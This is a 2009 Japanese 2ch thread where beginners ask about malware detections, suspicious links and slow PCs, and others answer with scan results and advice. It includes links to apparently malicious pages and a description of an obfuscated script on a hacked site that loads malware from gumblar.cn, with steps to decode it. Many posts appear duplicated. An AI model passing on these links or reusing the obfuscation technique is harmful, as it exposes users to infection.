セキュリティ初心者質問スレッドpart118
http://pc11.2ch.net/test/read.cgi/sec/1238849850/
PAC_Generic 001?何だそりゃ?
こっちで聞いたら?
↓↓↓
セキュリティ初心者質問スレッドpart118
http://pc11.2ch.net/test/read.cgi/sec/1238849850/
823 :名無しさん@お腹いっぱい。:2009/04/17(金) 17:22:17
>>821
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=Pak_Generic.001
ちなみにそのアドレスは有害。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=Pak_Generic.001
ちなみにそのアドレスは有害。
824 :名無しさん@お腹いっぱい。:2009/04/17(金) 17:25:09
825 :名無しさん@お腹いっぱい。:2009/04/17(金) 18:39:18
>>823
一体いつそのアドレスに行ったのか全く分かりません・・
フリーソフトを探している時にどこかと間違えたのかもしれませんが・・
ちなみにどうやってそのアドレスが危険と分かったのでしょうか?
初心者ですいません
>>824
私も見てみました。破壊活動の有無がないというのは一応削除できたので大丈夫ということなのでしょうか・・
一体いつそのアドレスに行ったのか全く分かりません・・
フリーソフトを探している時にどこかと間違えたのかもしれませんが・・
ちなみにどうやってそのアドレスが危険と分かったのでしょうか?
初心者ですいません
>>824
私も見てみました。破壊活動の有無がないというのは一応削除できたので大丈夫ということなのでしょうか・・
826 :821:2009/04/17(金) 18:50:15
すいません。821=825です。
書き忘れて申し訳ありませんでした。
書き忘れて申し訳ありませんでした。
827 :名無しさん@お腹いっぱい。:2009/04/17(金) 18:50:55
>>821
そこから拾ったファイルをVirustotalスキャン
http://www.virustotal.com/analisis/0b3f4ecbdc630090ddbd52c026066d7f
黒ですね・・・
NortonSafeWebのレポート
http://safeweb.norton.com/report/show?url=bosamedia.org
そこから拾ったファイルをVirustotalスキャン
http://www.virustotal.com/analisis/0b3f4ecbdc630090ddbd52c026066d7f
黒ですね・・・
NortonSafeWebのレポート
http://safeweb.norton.com/report/show?url=bosamedia.org
>>827
拾ったファイル?最近ダウンロードしたものはほぼないはずですが・・
やはりフリーソフト探している時に偽者掴まされたのかもしれません。
わざわざありがとうございました。
あとそのURLは安全でしたか?自分の質問のせいで答えてくれた方が被害にあってしまっては立つ瀬がないので・・
アクセスした瞬間感染とかするURLでしたか?
拾ったファイル?最近ダウンロードしたものはほぼないはずですが・・
やはりフリーソフト探している時に偽者掴まされたのかもしれません。
わざわざありがとうございました。
あとそのURLは安全でしたか?自分の質問のせいで答えてくれた方が被害にあってしまっては立つ瀬がないので・・
アクセスした瞬間感染とかするURLでしたか?
>>828
>アクセスした瞬間感染とかするURLでしたか?
とりあえず仮想環境で実験してみての結果、exeファイルをDLするページでアクセスした瞬間感染とかはない模様
あとVirustotalの結果一覧で821のファイルを検出できるベンダーはサイト開いた瞬間にブロックしてくれるのでご安心を
>アクセスした瞬間感染とかするURLでしたか?
とりあえず仮想環境で実験してみての結果、exeファイルをDLするページでアクセスした瞬間感染とかはない模様
あとVirustotalの結果一覧で821のファイルを検出できるベンダーはサイト開いた瞬間にブロックしてくれるのでご安心を
831 :名無しさん@お腹いっぱい。:2009/04/20(月) 20:59:06
知り合いのメッセから変なURLが送られてきた
ttp://img*****.PhotoChekker.com/?user=〜
****は乱数くさい。user=以降は相手のメッセID、DSCから始まるカメラ画像っぽいファイルとなる
どうやら懐かしいIRCbotの亜種らしい
とりあえず面白半分で、捨てPC使って踏んでみたんだが感染してないっぽい?
少なくとも、レジストリに変な値が増えてるようなことはない
google先生に聞いたら日本語ではこれしか引っかからなかった
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1325346163
潜伏先とか分かる人求む。どうやらメッセを最新にしてると感染しないくさいけど
ttp://img*****.PhotoChekker.com/?user=〜
****は乱数くさい。user=以降は相手のメッセID、DSCから始まるカメラ画像っぽいファイルとなる
どうやら懐かしいIRCbotの亜種らしい
とりあえず面白半分で、捨てPC使って踏んでみたんだが感染してないっぽい?
少なくとも、レジストリに変な値が増えてるようなことはない
google先生に聞いたら日本語ではこれしか引っかからなかった
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1325346163
潜伏先とか分かる人求む。どうやらメッセを最新にしてると感染しないくさいけど
832 :名無しさん@お腹いっぱい。:2009/04/21(火) 02:30:01
質問です!
sandboxieでブラウザ動かしたらウィルス感染とかって起きないんじゃないでしょうか?
終わったら仮想領域空っぽにすれば問題ないんじゃないですか?
sandboxieでブラウザ動かしたらウィルス感染とかって起きないんじゃないでしょうか?
終わったら仮想領域空っぽにすれば問題ないんじゃないですか?
833 :名無しさん@お腹いっぱい。:2009/04/21(火) 16:32:46
質問です
某スレで「_MACOSX .DSstore」とググって最初にヒットするサイトを見ろといわれ
URLをクリックしたらIEのタブが無限に増え続けてPCがフリーズしました
強制再起動かけたのですが、ウイルスに感染したのでしょうか?
OSはXPでavastは最新の状態です
URLを踏んだブラウザはスレイプニールですが、サイトを閉じたらIEが起動しました
某スレで「_MACOSX .DSstore」とググって最初にヒットするサイトを見ろといわれ
URLをクリックしたらIEのタブが無限に増え続けてPCがフリーズしました
強制再起動かけたのですが、ウイルスに感染したのでしょうか?
OSはXPでavastは最新の状態です
URLを踏んだブラウザはスレイプニールですが、サイトを閉じたらIEが起動しました
834 :名無しさん@お腹いっぱい。:2009/04/21(火) 16:49:48
>>833
某スレってどこ?それを最初に言わなきゃ?XPはSP3にしてる?IEはIE8?
FireFoxでアドオンNoscriptいれてればそういうのは防げるよ。
上のことやって、用心のためAguse Gatewayってサイト通してチェックしな、それで全て分かる。
某スレってどこ?それを最初に言わなきゃ?XPはSP3にしてる?IEはIE8?
FireFoxでアドオンNoscriptいれてればそういうのは防げるよ。
上のことやって、用心のためAguse Gatewayってサイト通してチェックしな、それで全て分かる。
835 : ◆N9P3SuvBPo :2009/04/21(火) 19:36:21
>833
>「_MACOSX .DSstore」とググって最初にヒットするサイトを見ろといわれ
自分も試してみましたが、IEが沢山開くことや、PCがフリーズすることはありませんでした。
ただのブラクラなので…
ブラウザの設定だけで回避可能&XPSP3とかIE7とかIE8とか全然関係なし
>「_MACOSX .DSstore」とググって最初にヒットするサイトを見ろといわれ
自分も試してみましたが、IEが沢山開くことや、PCがフリーズすることはありませんでした。
ただのブラクラなので…
ブラウザの設定だけで回避可能&XPSP3とかIE7とかIE8とか全然関係なし
836 :名無しさん@お腹いっぱい。:2009/04/21(火) 20:20:18
Fire「F」oxなんて書くアホはスルーで
837 :名無しさん@お腹いっぱい。:2009/04/22(水) 10:56:04
これはjpgウイルスですか?
windowsを最新の状態にしておけば感染しないのでしょうか?
ttp://image.i-bbs.sijex.net/bbs/jk/1240316988578m.jpg
windowsを最新の状態にしておけば感染しないのでしょうか?
ttp://image.i-bbs.sijex.net/bbs/jk/1240316988578m.jpg
838 :名無しさん@お腹いっぱい。:2009/04/22(水) 13:53:15
そういいつつ、それを貼るやつ
839 :名無しさん@お腹いっぱい。:2009/04/23(木) 13:43:58
>>837
ウイルスリンク貼ったので、おまえを通報しますた
ウイルスリンク貼ったので、おまえを通報しますた
840 :名無しさん@お腹いっぱい。:2009/04/25(土) 05:25:10
【使用OS】 「WindowsXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「カスペルスキーインターネットセキュリティ2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「Yes」
【スパイウェア対策ソフト】 「カスペの機能+Adaware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「Yes」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「MultiPacked.Multi.Generic」
ググっても日本語のページが無く、よく判りません…。
xfireというゲーマー用のツール&ページがあるのですが、そこでリアルタイム配信を見る為に
配信URLを開いたら、悪意の含まれるプログラムと言い上記の MultiPacked.Multi.Generic というものが
マルウェア?としてひっかかります。
駆除をしてみるのですが、駆除できないようです。
ログには以下のように出ています。
C:\DOCUMENTS AND SETTINGS\ユーザー名\LOCAL SETTINGS\APPLICATION DATA\DYYNO RECEIVER\dyyno.qtl/Edit
Dyyno P2P Receiver Application
駆除できません: MultiPacked.Multi.Generic
処理をスキップしました
DYYNOというのは、配信を見る為に必要なプラグインです。
むしろ、このプラグインがやばいのでしょうか…
MultiPacked.Multi.Genericとは何者なのでしょうか。
どうぞよろしくお願いします。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「カスペルスキーインターネットセキュリティ2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「Yes」
【スパイウェア対策ソフト】 「カスペの機能+Adaware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「Yes」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「MultiPacked.Multi.Generic」
ググっても日本語のページが無く、よく判りません…。
xfireというゲーマー用のツール&ページがあるのですが、そこでリアルタイム配信を見る為に
配信URLを開いたら、悪意の含まれるプログラムと言い上記の MultiPacked.Multi.Generic というものが
マルウェア?としてひっかかります。
駆除をしてみるのですが、駆除できないようです。
ログには以下のように出ています。
C:\DOCUMENTS AND SETTINGS\ユーザー名\LOCAL SETTINGS\APPLICATION DATA\DYYNO RECEIVER\dyyno.qtl/Edit
Dyyno P2P Receiver Application
駆除できません: MultiPacked.Multi.Generic
処理をスキップしました
DYYNOというのは、配信を見る為に必要なプラグインです。
むしろ、このプラグインがやばいのでしょうか…
MultiPacked.Multi.Genericとは何者なのでしょうか。
どうぞよろしくお願いします。
841 :名無しさん@お腹いっぱい。:2009/04/25(土) 06:17:56
>>840
Genericなら
疑わしい段階でマルウエアとして確認されたわけではない。
virustotalでほかのベンダーが検出しているか調べるとか、
http://www.kaspersky.co.jp/の最下部「新しいウイルスをお知らせください」
から検体を送るとかすると良いかと。
暫定的に安全性は落ちるがプロアクティブディフェンス切っておけば?
Genericなら
疑わしい段階でマルウエアとして確認されたわけではない。
virustotalでほかのベンダーが検出しているか調べるとか、
http://www.kaspersky.co.jp/の最下部「新しいウイルスをお知らせください」
から検体を送るとかすると良いかと。
暫定的に安全性は落ちるがプロアクティブディフェンス切っておけば?
842 :名無しさん@お腹いっぱい。:2009/04/26(日) 04:46:22
カスペルスのオンラインスキャンを試したところ、
jane styleのログが感染の疑いありと判断されました。
この場合、スレ一覧からログ削除を選択すれば解決するのでしょうか?
jane styleのログが感染の疑いありと判断されました。
この場合、スレ一覧からログ削除を選択すれば解決するのでしょうか?
843 :名無しさん@お腹いっぱい。:2009/04/26(日) 04:49:11
844 :名無しさん@お腹いっぱい。:2009/04/27(月) 22:57:27
確かbitdefenderだったと思うんですが、
Knoppixみたいに、1CDでWindows立ち上げずに
ウィルススキャンするのがあったと思うんですが
どこでしょうか?フリーじゃなかったですかね?
Knoppixみたいに、1CDでWindows立ち上げずに
ウィルススキャンするのがあったと思うんですが
どこでしょうか?フリーじゃなかったですかね?
845 :名無しさん@お腹いっぱい。:2009/04/27(月) 23:00:12
BitDefender
AntiVir
Avast
AVG
F-PROT
どれでもできるよ
AntiVir
Avast
AVG
F-PROT
どれでもできるよ
846 :名無しさん@お腹いっぱい。:2009/04/27(月) 23:07:58
847 :名無しさん@お腹いっぱい。:2009/04/27(月) 23:24:16
たびたびすんません、bootdiskである必要がありませんでした。
XPをセーフモードで立ち上げる場面で
「コマンドライン」にすれば、CD上のDOSスキャナでスキャン出来ますよね。
DOSスキャナを焼いてみます。
XPをセーフモードで立ち上げる場面で
「コマンドライン」にすれば、CD上のDOSスキャナでスキャン出来ますよね。
DOSスキャナを焼いてみます。
848 :名無しさん@お腹いっぱい。:2009/04/27(月) 23:38:20
コマンドライン版とか使えばお手軽だね
849 :名無しさん@お腹いっぱい。:2009/04/28(火) 17:25:05
【使用OS】 「XPHOMESP3」
【Microsoft Update(MU)の状態】 「基本的に最新(IEは6)」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【ルータの有無】 「yes」
ここ数日、PF使用量とieのメモリ使用量が増大します。
普段ならPC起動時350程度のPF使用量。ネットを数時間やっても800~1GB程度です。またieの使用メモリ量もそれほ
ど多くありません。ですが、ここ数日ieを起動して数クリック移動しただけでPFが1GBを超え、さらに使い続けると1時間も使用してない
にもかかわらず、PFが2GB以上行きます。ieの使用メモリ量もありえない量に増大しており
【Microsoft Update(MU)の状態】 「基本的に最新(IEは6)」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【ルータの有無】 「yes」
ここ数日、PF使用量とieのメモリ使用量が増大します。
普段ならPC起動時350程度のPF使用量。ネットを数時間やっても800~1GB程度です。またieの使用メモリ量もそれほ
ど多くありません。ですが、ここ数日ieを起動して数クリック移動しただけでPFが1GBを超え、さらに使い続けると1時間も使用してない
にもかかわらず、PFが2GB以上行きます。ieの使用メモリ量もありえない量に増大しており
850 :名無しさん@お腹いっぱい。:2009/04/28(火) 17:25:46
↑の続きです
例・通常
・2chを開く IEXPLORE.EXE 65.000KB
・ミギクリ別ウインドウで開く IEXPLORE.EXE 75.000KB
・ミギクリ別ウインドウで開く(その2) IEXPLORE.EXE 85.000KB
・2chを開く IEXPLORE.EXE 65.000KB
・URLクリック IEXPLORE.EXE 65.000KB
・URLさらにクリック IEXPLORE.EXE 70.000KB
今現在
・2chを開く IEXPLORE.EXE 65.000KB
・ミギクリ別ウインドウで開く IEXPLORE.EXE 150.000KB
・ミギクリ別ウインドウで開く(その2) IEXPLORE.EXE 400.000KB
・2chを開く IEXPLORE.EXE 65.000KB
・URLクリック IEXPLORE.EXE 150.000KB
・URLさらにクリック IEXPLORE.EXE 400.000KB
ちなみに数十分もすると2000.000KBとか行きます。勿論、ここ数日だけです
明らかに消費量がおかしいのですが(PFとIEの消費量)何か考えられる原因はありますか?
たしかに動作も重いような気もするのですが…
スペック
Core 2 Duo プロセッサー T8300 4GB(2GBx2) GeForce 8400M GS 128MB
例・通常
・2chを開く IEXPLORE.EXE 65.000KB
・ミギクリ別ウインドウで開く IEXPLORE.EXE 75.000KB
・ミギクリ別ウインドウで開く(その2) IEXPLORE.EXE 85.000KB
・2chを開く IEXPLORE.EXE 65.000KB
・URLクリック IEXPLORE.EXE 65.000KB
・URLさらにクリック IEXPLORE.EXE 70.000KB
今現在
・2chを開く IEXPLORE.EXE 65.000KB
・ミギクリ別ウインドウで開く IEXPLORE.EXE 150.000KB
・ミギクリ別ウインドウで開く(その2) IEXPLORE.EXE 400.000KB
・2chを開く IEXPLORE.EXE 65.000KB
・URLクリック IEXPLORE.EXE 150.000KB
・URLさらにクリック IEXPLORE.EXE 400.000KB
ちなみに数十分もすると2000.000KBとか行きます。勿論、ここ数日だけです
明らかに消費量がおかしいのですが(PFとIEの消費量)何か考えられる原因はありますか?
たしかに動作も重いような気もするのですが…
スペック
Core 2 Duo プロセッサー T8300 4GB(2GBx2) GeForce 8400M GS 128MB
851 :名無しさん@お腹いっぱい。:2009/04/28(火) 23:50:13
【使用OS】 「Vista Ultimate」
【Microsoft Update(MU)の状態】 「自動(出たらすぐに導入)」
【使用セキュリティソフトとバージョン】 「OneCare」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【スパイウェア対策ソフト】 「Onecare」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「yes」
【ルータの有無】 「有り」
あらゆるプログラムを起動する歳にOneCareが「インターネットへの接続を許可しますか」というポップアップを出すようになりました。
インターネットにアクセスしないであろうソフトを起動しても出てきます。
何かのウィルスかワームで、レジストリをいじってあらゆるソフトの起動と同時に活動するやつがいた記憶があるのですが、
そいつにやられているのでしょうか?
【Microsoft Update(MU)の状態】 「自動(出たらすぐに導入)」
【使用セキュリティソフトとバージョン】 「OneCare」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【スパイウェア対策ソフト】 「Onecare」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「yes」
【ルータの有無】 「有り」
あらゆるプログラムを起動する歳にOneCareが「インターネットへの接続を許可しますか」というポップアップを出すようになりました。
インターネットにアクセスしないであろうソフトを起動しても出てきます。
何かのウィルスかワームで、レジストリをいじってあらゆるソフトの起動と同時に活動するやつがいた記憶があるのですが、
そいつにやられているのでしょうか?
852 :八頭 ◆YAGApwSaEw :2009/04/28(火) 23:58:12
>>849
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2008」 ← 2009の方が軽いよ
★最新版 Norton Internet Security 2009 への無償アップグレード
http://pc11.2ch.net/test/read.cgi/sec/1239086455/
>ieの使用メモリ量もありえない量に増大
これはブラウザの設定&有効になっているアドオンの数&サービスの稼働状況 に起因するものだと思う
キャプチャ画像をセキュリティ初心者質問スレッドpart118 にUPすれば◆N9P3SuvBPoなどがアドバイスしてくれるだろう
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2008」 ← 2009の方が軽いよ
★最新版 Norton Internet Security 2009 への無償アップグレード
http://pc11.2ch.net/test/read.cgi/sec/1239086455/
>ieの使用メモリ量もありえない量に増大
これはブラウザの設定&有効になっているアドオンの数&サービスの稼働状況 に起因するものだと思う
キャプチャ画像をセキュリティ初心者質問スレッドpart118 にUPすれば◆N9P3SuvBPoなどがアドバイスしてくれるだろう
853 :八頭 ◆YAGApwSaEw :2009/04/29(水) 00:14:18
>>851
http://pc11.2ch.net/test/read.cgi/sec/1239086455/l50
・「a-squared Free 4.0」
・「Avira AntiVir Personal - FREE Antivirus, Version 8 (*9は非常駐化×)」
この2つをインストール > Update > フルスキャン して感染があるかどうか?調べてみるといいよ
http://pc11.2ch.net/test/read.cgi/sec/1239086455/l50
・「a-squared Free 4.0」
・「Avira AntiVir Personal - FREE Antivirus, Version 8 (*9は非常駐化×)」
この2つをインストール > Update > フルスキャン して感染があるかどうか?調べてみるといいよ
854 :名無しさん@お腹いっぱい。:2009/04/29(水) 02:28:53
OneCareにはソフトウェアエクスプローラ的なものは無かったかい?
あれば手っ取り早く調べられるんだが
あれば手っ取り早く調べられるんだが
>854
OneCareにはないですね。WindowsDeffender側のを起動させてみたんですが、とくに怪しいようなのはなかったてす。
探し方のコツとかありますか?
OneCareにはないですね。WindowsDeffender側のを起動させてみたんですが、とくに怪しいようなのはなかったてす。
探し方のコツとかありますか?
856 :八頭 ◆YAGApwSaEw :2009/04/29(水) 14:26:18
「Process Explorer」や「Process Monitor」のことかな?
次々とexeファイルに感染を拡げるタイプのウイルスには無意味
次々とexeファイルに感染を拡げるタイプのウイルスには無意味
857 :名無しさん@お腹いっぱい。:2009/04/29(水) 22:01:03
>>852
ありがとうございます
とりあえず2009にして見ます(どうも2007だったようです(汗
>ブラウザの設定&有効になっているアドオンの数&サービスの稼働状況 に起因する
分からないでもないんですが、その設定が突然変わったりすることはあるんでしょうか?
ありがとうございます
とりあえず2009にして見ます(どうも2007だったようです(汗
>ブラウザの設定&有効になっているアドオンの数&サービスの稼働状況 に起因する
分からないでもないんですが、その設定が突然変わったりすることはあるんでしょうか?
858 :名無しさん@お腹いっぱい。:2009/04/29(水) 23:50:32
859 :名無しさん@お腹いっぱい。:2009/04/30(木) 02:53:25
いまでもPCの知識に乏しいのですが、始めてすぐの頃にファイルをDLしたらスクリーンセーバーで
なんとなく使っていたんですが、".scr"という拡張子の場合偽装ウィルスである可能性が高いと聞いて
自分が開いたファイルはウィルスだったのか気になっています
偽装ウイルスの場合、中身はウイルスだけでデスクトップで普通に使用できるスクリーンセーバーは入っていないものなのでしょうか
p2pはやっておらず、セキュリティソフトのウイルス検索では何も発見されていません
どうかみなさんのご意見お聞かせください
なんとなく使っていたんですが、".scr"という拡張子の場合偽装ウィルスである可能性が高いと聞いて
自分が開いたファイルはウィルスだったのか気になっています
偽装ウイルスの場合、中身はウイルスだけでデスクトップで普通に使用できるスクリーンセーバーは入っていないものなのでしょうか
p2pはやっておらず、セキュリティソフトのウイルス検索では何も発見されていません
どうかみなさんのご意見お聞かせください
860 :名無しさん@お腹いっぱい。:2009/04/30(木) 03:57:31
861 :名無しさん@お腹いっぱい。:2009/04/30(木) 20:10:56
862 :859:2009/05/01(金) 00:09:03
863 :名無しさん@お腹いっぱい。:2009/05/01(金) 00:24:05
↑
ageてすみません
ageてすみません
864 :名無しさん@お腹いっぱい。:2009/05/01(金) 09:05:32
【使用OS】 「VISTAHP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてる」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なってる」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Adware-GameSpyArcade」
毎回スキャンのたびに表示されるからウイルスとかじゃないと思ってるんですが、
毎回隔離するのも面倒なので、検出されたものが危険なのか知りたいです。
一応ぐぐったり調べましたが具体的な回答が見つからないため質問に来ました。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてる」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なってる」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Adware-GameSpyArcade」
毎回スキャンのたびに表示されるからウイルスとかじゃないと思ってるんですが、
毎回隔離するのも面倒なので、検出されたものが危険なのか知りたいです。
一応ぐぐったり調べましたが具体的な回答が見つからないため質問に来ました。
865 :名無しさん@お腹いっぱい。:2009/05/01(金) 10:14:14
>>864
グーグル検索→一番上
に具体的にあったが
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.gamespyarcade.html
レジストリも削除が必要
グーグル検索→一番上
に具体的にあったが
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.gamespyarcade.html
レジストリも削除が必要
866 :名無しさん@お腹いっぱい。:2009/05/01(金) 10:18:29
867 :名無しさん@お腹いっぱい。:2009/05/01(金) 12:59:57
>>864
GameSpy Arcadeに関する何か使ってませんか?
GameSpy ArcadeはGameSpy Industries社製の汎用マッチメーキングソフトであり、
GameSpyArcade自体がアドウエアですので、必ず検出されます。(持っていれば
GameSpy Arcadeに関する何か使ってませんか?
GameSpy ArcadeはGameSpy Industries社製の汎用マッチメーキングソフトであり、
GameSpyArcade自体がアドウエアですので、必ず検出されます。(持っていれば
868 :名無しさん@お腹いっぱい。:2009/05/01(金) 14:04:24
869 :名無しさん@お腹いっぱい。:2009/05/01(金) 14:20:16
そういうのを直リンするとかバカなの?
870 :名無しさん@お腹いっぱい。:2009/05/01(金) 14:30:34
踏んだら危ないものを普通に貼るのはルール違反だぞ?被害者が増えたらどうする。
どうしても貼る場合はきちんと危険だってことを明記するのが礼儀。
どうしても貼る場合はきちんと危険だってことを明記するのが礼儀。
871 :名無しさん@お腹いっぱい。:2009/05/01(金) 14:35:44
とりあえずaguseだとウイルス反応はないな
872 :名無しさん@お腹いっぱい。:2009/05/01(金) 15:00:45
ソースをコピペしてVirusTotalにあげたが
AntiVir , Authentium , Avast , F-Prot , GData , McAfee-GW-Edition , Norman
で反応した。
検出したのをググってみたが、普通に常駐で反応し削除したのであれば問題ないかと。
心配なら、フルスキャンすればいい。
AntiVir , Authentium , Avast , F-Prot , GData , McAfee-GW-Edition , Norman
で反応した。
検出したのをググってみたが、普通に常駐で反応し削除したのであれば問題ないかと。
心配なら、フルスキャンすればいい。
873 :名無しさん@お腹いっぱい。:2009/05/01(金) 15:04:34
874 :名無しさん@お腹いっぱい。:2009/05/01(金) 15:27:33
875 :名無しさん@お腹いっぱい。:2009/05/02(土) 00:17:54
>>867
結構FPSゲームやるんですがそれですかね
ウイルスじゃないなら信用を押して検出しないようにしたいのでそこらへん教えてほしいです
レジストリから削除しちゃったんですけど、またプレイしたら入るんでしょうし
結構FPSゲームやるんですがそれですかね
ウイルスじゃないなら信用を押して検出しないようにしたいのでそこらへん教えてほしいです
レジストリから削除しちゃったんですけど、またプレイしたら入るんでしょうし
876 :名無しさん@お腹いっぱい。:2009/05/02(土) 18:43:02
さっきYahoo!で「ウェルネス」ってサイトを開こうとしたらavastが反応しました。医療や介護関係のまじめなサイトで社会に貢献しているサイトなのですが感染してるのでしょうか?
電話したのですが休みのようです。
他のソフトでも反応がでたら休み開けに再度、連絡してみようと思ってます。
電話したのですが休みのようです。
他のソフトでも反応がでたら休み開けに再度、連絡してみようと思ってます。
877 :名無しさん@お腹いっぱい。:2009/05/02(土) 18:52:03
そのアドレスを「ht」を省いてここに書いてくれ。
それと、サイト自体が改ざんされてマルウェア仕込まれるなんてよくあること。
878 :名無しさん@お腹いっぱい。:2009/05/02(土) 19:04:16
879 : ◆N9P3SuvBPo :2009/05/02(土) 20:07:05
>878
そのサイトのソース(問題と思われるコードだけ)をメモ帳にコピペしたものを、
virustotalに投げて見ました。3社が反応してくれました。(以下URL参照)
ttp://www.virustotal.com/jp/analisis/4c1586f687ca86a674d0d7092f475fe3
そのサイトのソース(問題と思われるコードだけ)をメモ帳にコピペしたものを、
virustotalに投げて見ました。3社が反応してくれました。(以下URL参照)
ttp://www.virustotal.com/jp/analisis/4c1586f687ca86a674d0d7092f475fe3
880 :名無しさん@お腹いっぱい。:2009/05/02(土) 20:16:28
そのサイトには、どっかの悪質なサイトにリダイレクトするスクリプトが仕込まれてるってさ。
砂箱経由でFirefoxからアクセスしたけど、特に何もなかったが・・・
砂箱経由でFirefoxからアクセスしたけど、特に何もなかったが・・・
881 :876です。 ◆reuJ2vDwKA :2009/05/02(土) 20:47:31
882 :名無しさん@お腹いっぱい。:2009/05/02(土) 21:38:16
>>878-881
それ、変なスクリプト仕込まれてて、今検出可否スレで話題になってる gumblar.cn に飛ばされるぞ。
http://pc11.2ch.net/test/read.cgi/sec/1235459712/690
VirtualPCで踏んでみたけど、俺の所はマルウェアのid2とid3が落ちてきた。
てか、genoの時と同じで、今の所スルーするセキュリティソフトが多いんで、マジでアクセスしない方が良い。
それ、変なスクリプト仕込まれてて、今検出可否スレで話題になってる gumblar.cn に飛ばされるぞ。
http://pc11.2ch.net/test/read.cgi/sec/1235459712/690
VirtualPCで踏んでみたけど、俺の所はマルウェアのid2とid3が落ちてきた。
てか、genoの時と同じで、今の所スルーするセキュリティソフトが多いんで、マジでアクセスしない方が良い。
883 : ◆N9P3SuvBPo :2009/05/02(土) 22:01:06
>882
その変なスクリプトというのが『@や英数字』なんですよね。
俺の環境ではIE直踏みでも大丈夫だけど、素人は興味本位でアクセスしない方が良い。
その変なスクリプトというのが『@や英数字』なんですよね。
俺の環境ではIE直踏みでも大丈夫だけど、素人は興味本位でアクセスしない方が良い。
>>883
そう。Javascriptのreplaceとunescapeを使って難読化されている。
@を%に置き換えてunescape関数を実行すると、元のスクリプトが出てくる。(普段はブラウザが勝手にやってる)
※ 俺はJavascriptに詳しい訳じゃないので、逆にその程度しかわからんが。
Firefox+Noscriptなら許可しない限り実行されないから問題ないけど、IEだとごく普通に勝手に実行されてマルウェアが落ちてくる。
Acrobat Readerや Flash Playerが古いままだと、現時点ではスルーするセキュリティソフトがほとんどだから、この時点でアウト。
そう。Javascriptのreplaceとunescapeを使って難読化されている。
@を%に置き換えてunescape関数を実行すると、元のスクリプトが出てくる。(普段はブラウザが勝手にやってる)
※ 俺はJavascriptに詳しい訳じゃないので、逆にその程度しかわからんが。
Firefox+Noscriptなら許可しない限り実行されないから問題ないけど、IEだとごく普通に勝手に実行されてマルウェアが落ちてくる。
Acrobat Readerや Flash Playerが古いままだと、現時点ではスルーするセキュリティソフトがほとんどだから、この時点でアウト。
885 :名無しさん@お腹いっぱい。:2009/05/02(土) 22:31:25
あー、気持ち悪いからOS入れ直してくるわ。
886 :名無しさん@お腹いっぱい。:2009/05/02(土) 22:40:07
Firefox+Noscriptを使ってはいるけど
ウェルネスなんかの真面目なサイトだと普段覗いてれば
許可出してしまいがちだから怖いなぁ
ウェルネスなんかの真面目なサイトだと普段覗いてれば
許可出してしまいがちだから怖いなぁ
887 : ◆N9P3SuvBPo :2009/05/02(土) 22:54:19
>884
>@を%に置き換えて
頑張って手動でやってみようとしたけど
海外のエロサイトリンクに***%2f***というのがよく出るので、@2fが / だということしか分かりませんでした。
>886
極普通の真面目なサイトが不正アクセス受けて改ざんされて
安全なサイトだからつい許可してしまったら感染…
俺らは一体何を信用すればいいの?
という事態に成りかねないですよね。
>@を%に置き換えて
頑張って手動でやってみようとしたけど
海外のエロサイトリンクに***%2f***というのがよく出るので、@2fが / だということしか分かりませんでした。
>886
極普通の真面目なサイトが不正アクセス受けて改ざんされて
安全なサイトだからつい許可してしまったら感染…
俺らは一体何を信用すればいいの?
という事態に成りかねないですよね。
>>887
手動でやるのは無理なので、こういうサイトを利用するのでし。
ttp://www.broadband-xp.com/hidesource/escape.html
今回のだと、ソースの中のunescapeの部分に注目して、あとreplase部分から@→%の置換があることに当たりを付けて、
1) unescape関数の中身('@〜'まで)をテキストエディタにコピー
2) エディタ上で@を%に置換
3) 置換後のテキストを、上記のサイトの右側の欄に貼り付け
4) unescape関数でデコード のボタンを押す
そうすると、左側に元のスクリプトが表示されます。今回のだと、前の方でOS判定をやって、
最後の所で src=//gumblar.cn/〜 でマルウェアを落とすようになっていることがわかるのです。
手動でやるのは無理なので、こういうサイトを利用するのでし。
ttp://www.broadband-xp.com/hidesource/escape.html
今回のだと、ソースの中のunescapeの部分に注目して、あとreplase部分から@→%の置換があることに当たりを付けて、
1) unescape関数の中身('@〜'まで)をテキストエディタにコピー
2) エディタ上で@を%に置換
